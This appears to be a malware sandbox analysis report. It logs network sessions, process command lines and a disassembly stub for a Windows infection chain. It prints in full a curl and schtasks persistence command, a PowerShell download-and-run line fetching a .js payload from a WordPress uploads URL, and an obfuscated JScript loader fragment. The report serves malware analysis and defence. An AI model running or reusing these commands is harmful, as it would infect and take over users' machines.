                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:11:42 UTC203INData Raw: 63 35 0d 0a 73 74 61 72 74 20 2f 6d 69 6e 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 20 22 49 57 52 20 2d 75 73 65 62 20 27 68 74 74 70 73 3a 2f 2f 61 64 6d 69 72 61 6c 70 75 62 2e 63 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 6f 6c 69 67 6f 70 68 6f 73 70 68 61 74 75 72 69 61 2e 70 68 70 27 20 2d 6f 75 74 66 20 27 25 74 6d 70 25 5c 45 47 4c 47 36 44 4a 4f 59 39 4b 39 2e 6a 73 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 25 31 20 2f 66 3b 20 77 73 63 72 69 70 74 20 25 74 6d 70 25 5c 45 47 4c 47 36 44 4a 4f 59 39 4b 39 2e 6a 73 22 0d 0a
                  Data Ascii: c5start /min powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf '%tmp%\EGLG6DJOY9K9.js'; schtasks /delete /tn %1 /f; wscript %tmp%\EGLG6DJOY9K9.js"
                  2024-03-28 17:11:42 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549707103.26.141.284435668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-03-28 17:11:47 UTC203OUTGET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:11:47 UTC208INHTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:11:47 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:11:47 UTC1094INData Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii: 43fvar f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:11:47 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549716103.26.141.284432952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-03-28 17:12:03 UTC203OUTGET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:12:04 UTC208INHTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:12:04 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:12:04 UTC1094INData Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii: 43fvar f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:12:04 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549719103.26.141.284437084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-03-28 17:13:02 UTC203OUTGET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: admiralpub.ca
                  Connection: Keep-Alive
                  2024-03-28 17:13:03 UTC208INHTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:13:03 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Vary: Accept-Encoding
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-03-28 17:13:03 UTC1094INData Raw: 34 33 66 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0d 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 3b 0d 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0d 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0d 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0d 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27
                  Data Ascii: 43fvar f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'
                  2024-03-28 17:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:18:11:40
                  Start date:28/03/2024
                  Path:C:\Windows\System32\curl.exe
                  Wow64 process (32bit):false
                  Commandline:curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
                  Imagebase:0x7ff65f170000
                  File size:530'944 bytes
                  MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:4
                  Start time:18:11:41
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:5
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:18:11:43
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:18:11:46
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:10
                  Start time:18:11:46
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase:0x7ff78aec0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:13
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:15
                  Start time:18:12:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:16
                  Start time:18:12:02
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:17
                  Start time:18:12:02
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase:0x7ff78aec0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:19
                  Start time:18:13:00
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
                  Imagebase:0x7ff6d33e0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:20
                  Start time:18:13:00
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:21
                  Start time:18:13:00
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:22
                  Start time:18:13:00
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:23
                  Start time:18:13:01
                  Start date:28/03/2024
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
                  Imagebase:0x7ff7eb350000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:24
                  Start time:18:13:02
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
                  Imagebase:0x7ff78aec0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000007.00000002.2057772336.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ff848f10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                    Uniqueness

                    Uniqueness Score: -1.00%